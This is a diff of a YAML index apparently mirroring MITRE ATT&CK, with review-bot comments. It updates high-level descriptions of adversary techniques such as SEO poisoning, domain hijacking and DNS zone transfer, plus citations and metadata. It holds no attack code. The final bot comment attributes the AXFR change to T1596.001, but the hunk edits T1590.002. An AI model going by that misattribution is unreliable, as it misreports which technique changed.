- it may be difficult to distinguish from ordinary traffic to these providers.(Citation:
+ Malware Cloudflare Workers)(Citation: AWS Lambda Redirector)(Citation: GWS
+ Apps Script Abuse 2021) As traffic generated by these functions will appear
+ to come from subdomains of common cloud providers, it may be difficult to
+ distinguish from ordinary traffic to these providers - making it easier to
+ [Hide Infrastructure](https://attack.mitre.org/techniques/T1665).(Citation:
Detecting Command & Control in the Cloud)(Citation: BlackWater Malware Cloudflare
Workers)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: resource-development
- x_mitre_detection: ''
- x_mitre_platforms:
- - PRE
- x_mitre_is_subtechnique: true
+ x_mitre_contributors:
+ - Awake Security
x_mitre_deprecated: false
+ x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
- x_mitre_version: '1.0'
- x_mitre_contributors:
- - Awake Security
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Internet Scan: Response Content'
type: attack-pattern
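Review bot: `spec_version: '2.1'` is dropped from the object at the top of this hunk and again from T1584.007 further down, and the same removal repeats for every technique in this diff. Confirm that nothing consuming this index reads `spec_version`; after this change the only version marker left on each object is `x_mitre_attack_spec_version: 3.2.0`. The description edit itself is consistent: the new Google Apps Script sentence is backed by the new `GWS Apps Script Abuse 2021` citation and the `x_mitre_version` bump from '1.0' to '1.1'.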
@@ -53809,11 +54469,14 @@ resource-development:
description: Lawrence Abrams. (2020, March 14). BlackWater Malware Abuses
Cloudflare Workers for C2 Communication. Retrieved July 8, 2022.
url: https://www.bleepingcomputer.com/news/security/blackwater-malware-abuses-cloudflare-workers-for-c2-communication/
+ - source_name: GWS Apps Script Abuse 2021
+ description: Sergiu Gatlan. (2021, February 18). Hackers abuse Google Apps
+ Script to steal credit cards, bypass CSP. Retrieved July 1, 2024.
+ url: https://www.bleepingcomputer.com/news/security/hackers-abuse-google-apps-script-to-steal-credit-cards-bypass-csp/#google_vignette
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1584.004:
technique:
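Review bot: the `url` of the new `GWS Apps Script Abuse 2021` reference ends in `#google_vignette`, which is an AdSense interstitial fragment picked up from the browser address bar, not part of the article's address; the reference should point at `https://www.bleepingcomputer.com/news/security/hackers-abuse-google-apps-script-to-steal-credit-cards-bypass-csp/`. Since this file mirrors upstream ATT&CK STIX, fix it at the source rather than hand-editing only this index.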
@@ -53871,17 +54534,18 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1608.006:
technique:
- modified: '2023-03-13T20:35:52.302Z'
+ modified: '2024-08-14T15:03:56.383Z'
name: SEO Poisoning
description: |-
Adversaries may poison mechanisms that influence search engine optimization (SEO) to further lure staged capabilities towards potential victims. Search engines typically display results to users based on purchased ads as well as the site’s ranking/score/reputation calculated by their web crawlers and algorithms.(Citation: Atlas SEO)(Citation: MalwareBytes SEO)
To help facilitate [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), adversaries may stage content that explicitly manipulates SEO rankings in order to promote sites hosting their malicious payloads (such as [Drive-by Target](https://attack.mitre.org/techniques/T1608/004)) within search engines. Poisoning SEO rankings may involve various tricks, such as stuffing keywords (including in the form of hidden text) into compromised sites. These keywords could be related to the interests/browsing habits of the intended victim(s) as well as more broad, seasonably popular topics (e.g. elections, trending news).(Citation: ZScaler SEO)(Citation: Atlas SEO)
+ In addition to internet search engines (such as Google), adversaries may also aim to manipulate specific in-site searches for developer platforms (such as GitHub) to deceive users towards [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) lures. In-site searches will rank search results according to their own algorithms and metrics such as popularity(Citation: Chexmarx-seo) which may be targeted and gamed by malicious actors.(Citation: Checkmarx-oss-seo)
+
Adversaries may also purchase or plant incoming links to staged capabilities in order to boost the site’s calculated relevance and reputation.(Citation: MalwareBytes SEO)(Citation: DFIR Report Gootloader)
SEO poisoning may also be combined with evasive redirects and other cloaking mechanisms (such as measuring mouse movements or serving content based on browser user agents, user language/localization settings, or HTTP headers) in order to feed SEO inputs while avoiding scrutiny from defenders.(Citation: ZScaler SEO)(Citation: Sophos Gootloader)
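Review bot: in the new paragraph the citation key `Chexmarx-seo` is misspelled (its sibling is `Checkmarx-oss-seo`), and `popularity(Citation: Chexmarx-seo)` is missing the space before the citation. The key has to match the `source_name` added to `external_references` later in this diff, which carries the same misspelling, so either rename both together or leave both alone; a one-sided fix would break citation resolution.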
@@ -53889,7 +54553,7 @@ resource-development:
- kill_chain_name: mitre-attack
phase_name: resource-development
x_mitre_contributors:
- - Goldstein Menachem
+ - Menachem Goldstein
- Vijay Lalwani
- Will Thomas, Equinix Threat Analysis Center (ETAC)
- Will Jolliffe
@@ -53903,7 +54567,7 @@ resource-development:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- PRE
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Internet Scan: Response Content'
type: attack-pattern
@@ -53936,11 +54600,18 @@ resource-development:
description: Wang, J. (2018, October 17). Ubiquitous SEO Poisoning URLs. Retrieved
September 30, 2022.
url: https://www.zscaler.com/blogs/security-research/ubiquitous-seo-poisoning-urls-0
+ - source_name: Chexmarx-seo
+ description: 'Yehuda Gelb. (2023, November 30). The GitHub Black Market: Gaming
+ the Star Ranking Game. Retrieved June 18, 2024.'
+ url: https://zero.checkmarx.com/the-github-black-market-gaming-the-star-ranking-game-fc42f5913fb7
+ - source_name: Checkmarx-oss-seo
+ description: Yehuda Gelb. (2024, April 10). New Technique to Trick Developers
+ Detected in an Open Source Supply Chain Attack. Retrieved June 18, 2024.
+ url: https://checkmarx.com/blog/new-technique-to-trick-developers-detected-in-an-open-source-supply-chain-attack/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1588.003:
technique:
@@ -53962,7 +54633,7 @@ resource-development:
description: Wikipedia. (2015, November 10). Code Signing. Retrieved March
31, 2016.
source_name: Wikipedia Code Signing
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-17T16:19:50.018Z'
name: Code Signing Certificates
description: |-
Adversaries may buy and/or steal code signing certificates that can be used during targeting. Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Code signing provides a level of authenticity for a program from the developer and a guarantee that the program has not been tampered with.(Citation: Wikipedia Code Signing) Users and/or security tools may trust a signed piece of code more than an unsigned piece of code even if they don't know who issued the certificate or who the author is.
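Review bot: the `modified` timestamp for T1588.003 moves backwards, from 2022-04-25 to 2021-10-17, and the same regression appears later in this diff for T1588.005, T1596.003, T1597.002, T1590.005 and T1596.002. If the uniform `2022-04-25T14:00:00.188Z` values were a bulk timestamp applied by an earlier import, this is a correction and the PR description should say so; otherwise it suggests an older STIX bundle was used for these objects and the source should be checked before merging.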
@@ -53980,47 +54651,10 @@ resource-development:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Malware Repository: Malware Metadata'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1587:
technique:
- x_mitre_platforms:
- - PRE
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--edadea33-549c-4ed1-9783-8f5a5853cbdf
- type: attack-pattern
- created: '2020-10-01T01:30:00.877Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1587
- url: https://attack.mitre.org/techniques/T1587
- - url: https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf
- description: Mandiant. (n.d.). APT1 Exposing One of China’s Cyber Espionage
- Units. Retrieved July 18, 2016.
- source_name: Mandiant APT1
- - source_name: Kaspersky Sofacy
- description: Kaspersky Lab's Global Research and Analysis Team. (2015, December
- 4). Sofacy APT hits high profile targets with updated toolset. Retrieved
- December 10, 2015.
- url: https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/
- - source_name: Bitdefender StrongPity June 2020
- url: https://www.bitdefender.com/files/News/CaseStudies/study/353/Bitdefender-Whitepaper-StrongPity-APT.pdf
- description: Tudorica, R. et al. (2020, June 30). StrongPity APT - Revealing
- Trojanized Tools, Working Hours and Infrastructure. Retrieved July 20, 2020.
- - source_name: Talos Promethium June 2020
- url: https://blog.talosintelligence.com/2020/06/promethium-extends-with-strongpity3.html
- description: Mercer, W. et al. (2020, June 29). PROMETHIUM extends global
- reach with StrongPity3 APT. Retrieved July 20, 2020.
- - source_name: Splunk Kovar Certificates 2017
- url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
- description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
- Certificates. Retrieved October 16, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-15T16:31:17.270Z'
name: Develop Capabilities
description: |-
Adversaries may build capabilities that can be used during targeting. Rather than purchasing, freely downloading, or stealing capabilities, adversaries may develop their own capabilities in-house. This is the process of identifying development requirements and building solutions such as malware, exploits, and self-signed certificates. Adversaries may develop capabilities to support their operations throughout numerous phases of the adversary lifecycle.(Citation: Mandiant APT1)(Citation: Kaspersky Sofacy)(Citation: Bitdefender StrongPity June 2020)(Citation: Talos Promethium June 2020)
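Review bot: this hunk deletes the whole `external_references` block of T1587 (mitre-attack, Mandiant APT1, Kaspersky Sofacy, Bitdefender StrongPity June 2020, Talos Promethium June 2020, Splunk Kovar Certificates 2017) together with `id`, `type`, `created`, `created_by_ref`, `x_mitre_platforms`, `x_mitre_domains` and `object_marking_refs`. All of them reappear at the end of the object in the next hunk, so this is a key-order change with no content loss, but that should be confirmed with a YAML-aware diff rather than by eye. Emitting keys in a stable order from the generator would keep future updates down to the actual change.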
@@ -54029,21 +54663,57 @@ resource-development:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: resource-development
+ x_mitre_deprecated: false
x_mitre_detection: |-
Consider analyzing malware for features that may be associated with the adversary and/or their developers, such as compiler used, debugging artifacts, or code similarities. Malware repositories can also be used to identify additional samples associated with the adversary and identify development patterns over time.
Consider use of services that may aid in the tracking of certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017)
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Defense Evasion or Command and Control.
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - PRE
x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Malware Repository: Malware Content'
- 'Malware Repository: Malware Metadata'
- 'Internet Scan: Response Content'
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--edadea33-549c-4ed1-9783-8f5a5853cbdf
+ created: '2020-10-01T01:30:00.877Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1587
+ external_id: T1587
+ - source_name: Kaspersky Sofacy
+ description: Kaspersky Lab's Global Research and Analysis Team. (2015, December
+ 4). Sofacy APT hits high profile targets with updated toolset. Retrieved
+ December 10, 2015.
+ url: https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/
+ - source_name: Splunk Kovar Certificates 2017
+ description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
+ Certificates. Retrieved October 16, 2020.
+ url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
+ - source_name: Mandiant APT1
+ description: Mandiant. (n.d.). APT1 Exposing One of China’s Cyber Espionage
+ Units. Retrieved July 18, 2016.
+ url: https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf
+ - source_name: Talos Promethium June 2020
+ description: Mercer, W. et al. (2020, June 29). PROMETHIUM extends global
+ reach with StrongPity3 APT. Retrieved July 20, 2020.
+ url: https://blog.talosintelligence.com/2020/06/promethium-extends-with-strongpity3.html
+ - source_name: Bitdefender StrongPity June 2020
+ description: Tudorica, R. et al. (2020, June 30). StrongPity APT - Revealing
+ Trojanized Tools, Working Hours and Infrastructure. Retrieved July 20, 2020.
+ url: https://www.bitdefender.com/files/News/CaseStudies/study/353/Bitdefender-Whitepaper-StrongPity-APT.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1588.005:
technique:
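Review bot: `revoked: false` and `x_mitre_deprecated: false` become explicit keys on T1587 here while `x_mitre_version` stays at '1.1' and only `modified` advances. If the index builder filters on `revoked` or `x_mitre_deprecated`, make sure an absent key and an explicit `false` are treated identically, so that objects updated in this diff and objects that have not been regenerated yet are filtered the same way.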
@@ -54083,7 +54753,7 @@ resource-development:
description: Zetter, K. (2019, October 3). Researchers Say They Uncovered
Uzbekistan Hacking Operations Due to Spectacularly Bad OPSEC. Retrieved
October 15, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:14:01.255Z'
name: Exploits
description: |-
Adversaries may buy, steal, or download exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than developing their own exploits, an adversary may find/modify exploits from online or purchase them from exploit vendors.(Citation: Exploit Database)(Citation: TempertonDarkHotel)(Citation: NationsBuying)
@@ -54102,15 +54772,13 @@ resource-development:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1584.001:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2024-09-24T15:10:40.270Z'
name: Domains
description: |-
- Adversaries may hijack domains and/or subdomains that can be used during targeting. Domain registration hijacking is the act of changing the registration of a domain name without the permission of the original registrant.(Citation: ICANNDomainNameHijacking) Adversaries may gain access to an email account for the person listed as the owner of the domain. The adversary can then claim that they forgot their password in order to make changes to the domain registration. Other possibilities include social engineering a domain registration help desk to gain access to an account or taking advantage of renewal process gaps.(Citation: Krebs DNS Hijack 2019)
+ Adversaries may hijack domains and/or subdomains that can be used during targeting. Domain registration hijacking is the act of changing the registration of a domain name without the permission of the original registrant.(Citation: ICANNDomainNameHijacking) Adversaries may gain access to an email account for the person listed as the owner of the domain. The adversary can then claim that they forgot their password in order to make changes to the domain registration. Other possibilities include social engineering a domain registration help desk to gain access to an account, taking advantage of renewal process gaps, or compromising a cloud service that enables managing domains (e.g., AWS Route53).(Citation: Krebs DNS Hijack 2019)
Subdomain hijacking can occur when organizations have DNS entries that point to non-existent or deprovisioned resources. In such cases, an adversary may take control of a subdomain to conduct operations with the benefit of the trust associated with that domain.(Citation: Microsoft Sub Takeover 2020)
@@ -54118,19 +54786,19 @@ resource-development:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: resource-development
+ x_mitre_contributors:
+ - Jeremy Galloway
+ x_mitre_deprecated: false
x_mitre_detection: |-
Consider monitoring for anomalous changes to domain registrant information and/or domain resolution information that may indicate the compromise of a domain. Efforts may need to be tailored to specific domains of interest as benign registration and resolution changes are a common occurrence on the internet.
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.
- x_mitre_platforms:
- - PRE
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
x_mitre_domains:
- enterprise-attack
- x_mitre_version: '1.3'
- x_mitre_contributors:
- - Jeremy Galloway
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Domain Name: Passive DNS'
- 'Domain Name: Domain Registration'
@@ -54164,55 +54832,64 @@ resource-development:
url: https://docs.microsoft.com/en-us/azure/security/fundamentals/subdomain-takeover
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
reconnaissance:
T1592:
technique:
- x_mitre_platforms:
- - PRE
+ modified: '2024-10-03T19:35:07.269Z'
+ name: Gather Victim Host Information
+ description: |-
+ Adversaries may gather information about the victim's hosts that can be used during targeting. Information about hosts may include a variety of details, including administrative data (ex: name, assigned IP, functionality, etc.) as well as specifics regarding its configuration (ex: operating system, language, etc.).
+
+ Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about hosts may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [External Remote Services](https://attack.mitre.org/techniques/T1133)).
+
+ Adversaries may also gather victim host information via User-Agent HTTP headers, which are sent to a server to identify the application, operating system, vendor, and/or version of the requesting user agent. This can be used to inform the adversary’s follow-on action. For example, adversaries may check user agents for the requesting operating system, then only serve malware for target operating systems while ignoring others.(Citation: TrellixQakbot)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: reconnaissance
+ x_mitre_contributors:
+ - Sam Seabrook, Duke Energy
+ x_mitre_deprecated: false
+ x_mitre_detection: |-
+ Internet scanners may be used to look for patterns associated with malicious content designed to collect host information from visitors.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: ATT ScanBox)
+
+ Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
x_mitre_domains:
- enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--09312b1a-c3c6-4b45-9844-3ccc78e5d82f
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - PRE
+ x_mitre_version: '1.2'
+ x_mitre_data_sources:
+ - 'Internet Scan: Response Content'
type: attack-pattern
+ id: attack-pattern--09312b1a-c3c6-4b45-9844-3ccc78e5d82f
created: '2020-10-02T16:39:33.966Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1592
url: https://attack.mitre.org/techniques/T1592
+ external_id: T1592
- source_name: ATT ScanBox
- url: https://cybersecurity.att.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks
description: 'Blasco, J. (2014, August 28). Scanbox: A Reconnaissance Framework
Used with Watering Hole Attacks. Retrieved October 19, 2020.'
+ url: https://cybersecurity.att.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks
+ - source_name: TrellixQakbot
+ description: Pham Duy Phuc, John Fokker J.E., Alejandro Houspanossian and
+ Mathanraj Thangaraju. (2023, March 7). Qakbot Evolves to OneNote Malware
+ Distribution. Retrieved August 1, 2024.
+ url: https://www.trellix.com/blogs/research/qakbot-evolves-to-onenote-malware-distribution/
- source_name: ThreatConnect Infrastructure Dec 2020
- url: https://threatconnect.com/blog/infrastructure-research-hunting/
description: 'ThreatConnect. (2020, December 15). Infrastructure Research
and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
- modified: '2022-04-25T14:00:00.188Z'
- name: Gather Victim Host Information
- description: |-
- Adversaries may gather information about the victim's hosts that can be used during targeting. Information about hosts may include a variety of details, including administrative data (ex: name, assigned IP, functionality, etc.) as well as specifics regarding its configuration (ex: operating system, language, etc.).
-
- Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about hosts may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [External Remote Services](https://attack.mitre.org/techniques/T1133)).
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: reconnaissance
- x_mitre_detection: |-
- Internet scanners may be used to look for patterns associated with malicious content designed to collect host information from visitors.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: ATT ScanBox)
-
- Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
- x_mitre_version: '1.1'
+ url: https://threatconnect.com/blog/infrastructure-research-hunting/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- x_mitre_data_sources:
- - 'Internet Scan: Response Content'
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1596.003:
technique:
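Review bot: the substantive change to T1592 is the new third description paragraph on User-Agent header profiling, the `TrellixQakbot` citation that backs it, the new contributor and the `x_mitre_version` bump from '1.1' to '1.2'; the rest of this hunk is key reordering, with the description, detection text and the ATT ScanBox and ThreatConnect references deleted and re-added unchanged. Worth noting that `x_mitre_detection` is unchanged even though the description now names a new collection vector, so the detection guidance says nothing about server-side User-Agent checks; that is an upstream ATT&CK matter rather than something to patch in this index.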
@@ -54237,7 +54914,7 @@ reconnaissance:
url: https://medium.com/@menakajain/export-download-ssl-certificate-from-server-site-url-bcfc41ea46a2
description: Jain, M. (2019, September 16). Export & Download — SSL Certificate
from Server (Site URL). Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:48:37.628Z'
name: Digital Certificates
description: |-
Adversaries may search public digital certificate data for information about victims that can be used during targeting. Digital certificates are issued by a certificate authority (CA) in order to cryptographically verify the origin of signed content. These certificates, such as those used for encrypted web traffic (HTTPS SSL/TLS communications), contain information about the registered organization such as name and location.
@@ -54253,8 +54930,6 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1597.002:
technique:
@@ -54276,7 +54951,7 @@ reconnaissance:
url: https://www.zdnet.com/article/a-hacker-group-is-selling-more-than-73-million-user-records-on-the-dark-web/
description: Cimpanu, C. (2020, May 9). A hacker group is selling more than
73 million user records on the dark web. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:44:43.900Z'
name: Purchase Technical Data
description: |-
Adversaries may purchase technical information about victims that can be used during targeting. Information about victims may be available for purchase within reputable private sources and databases, such as paid subscriptions to feeds of scan databases or other data aggregation services. Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.
@@ -54292,8 +54967,6 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1590.005:
technique:
@@ -54321,7 +54994,7 @@ reconnaissance:
url: https://www.circl.lu/services/passive-dns/
description: CIRCL Computer Incident Response Center. (n.d.). Passive DNS.
Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:31:05.302Z'
name: IP Addresses
description: |-
Adversaries may gather the victim's IP addresses that can be used during targeting. Public IP addresses may be allocated to organizations by block, or a range of sequential addresses. Information about assigned IP addresses may include a variety of details, such as which IP addresses are in use. IP addresses may also enable an adversary to derive other details about a victim, such as organizational size, physical location(s), Internet service provider, and or where/how their publicly-facing infrastructure is hosted.
@@ -54337,33 +55010,33 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1590.002:
technique:
- modified: '2022-10-21T14:32:48.393Z'
+ modified: '2024-11-11T16:13:02.196Z'
name: DNS
description: |-
- Adversaries may gather information about the victim's DNS that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts. DNS, MX, TXT, and SPF records may also reveal the use of third party cloud and SaaS providers, such as Office 365, G Suite, Salesforce, or Zendesk.(Citation: Sean Metcalf Twitter DNS Records)
+ Adversaries may gather information about the victim's DNS that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts. DNS MX, TXT, and SPF records may also reveal the use of third party cloud and SaaS providers, such as Office 365, G Suite, Salesforce, or Zendesk.(Citation: Sean Metcalf Twitter DNS Records)
Adversaries may gather this information in various ways, such as querying or otherwise collecting details via [DNS/Passive DNS](https://attack.mitre.org/techniques/T1596/001). DNS information may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)).(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596), [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593), or [Active Scanning](https://attack.mitre.org/techniques/T1595)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)).
+
+ Adversaries may also use DNS zone transfer (DNS query type AXFR) to collect all records from a misconfigured DNS server.(Citation: Trails-DNS)(Citation: DNS-CISA)(Citation: Alexa-dns)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: reconnaissance
+ x_mitre_contributors:
+ - Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
+ x_mitre_deprecated: false
x_mitre_detection: |-
Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
- x_mitre_platforms:
- - PRE
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
x_mitre_domains:
- enterprise-attack
- x_mitre_version: '1.1'
- x_mitre_contributors:
- - Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ x_mitre_version: '1.2'
type: attack-pattern
id: attack-pattern--0ff59227-8aa8-4c09-bf1f-925605bd07ea
created: '2020-10-02T15:47:10.102Z'
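Review bot: The AXFR paragraph added to the T1596.001 description (`+ Adversaries may also use DNS zone transfer (DNS query type AXFR) to collect all records from a misconfigured DNS server.`) describes something the victim can observe directly, because a zone transfer request lands on the organization's own authoritative name server, yet the `x_mitre_detection` block that follows is left unchanged and still says the activity may take place outside the target's visibility and defers detection to Initial Access. Since `x_mitre_version` moves from '1.1' to '1.2' in this hunk, check whether the upstream object also changed its detection text (a sentence about logging AXFR requests that reach authoritative servers from unexpected sources would be the natural counterpart) or only the description; if this index is regenerated from ATT&CK data, raise it upstream rather than hand-editing the generated file.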
@@ -54377,18 +55050,29 @@ reconnaissance:
description: CIRCL Computer Incident Response Center. (n.d.). Passive DNS.
Retrieved October 20, 2020.
